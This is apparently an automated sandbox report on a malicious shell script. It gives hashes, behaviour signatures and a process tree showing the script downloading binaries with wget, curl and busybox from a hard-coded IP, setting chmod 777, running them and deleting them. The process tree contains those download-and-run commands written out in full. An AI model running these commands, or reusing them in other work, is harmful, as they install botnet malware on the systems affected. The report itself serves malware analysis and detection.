Analysis
-
max time kernel
70s -
max time network
99s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 922 chmod 935 chmod 941 chmod 947 chmod 874 chmod 929 chmod 959 chmod 785 chmod 735 chmod 817 chmod 852 chmod 898 chmod 965 chmod 742 chmod 748 chmod 760 chmod 811 chmod 904 chmod 910 chmod 829 chmod 868 chmod 916 chmod 953 chmod 977 chmod 892 chmod 971 chmod 880 chmod 886 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 736 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 743 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 749 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 762 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 787 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 812 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 818 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 830 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 853 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 869 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 875 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 881 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 887 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 893 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 899 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 905 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 911 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 917 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 923 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 930 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 936 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 942 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 948 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 954 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 960 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 966 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 972 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 978 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:733
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:741
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:747
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:757
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:781
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:809
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:816
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:822
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:849
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:867
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:873
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:879
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:885
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:891
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:897
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:903
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:909
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:915
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:921
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
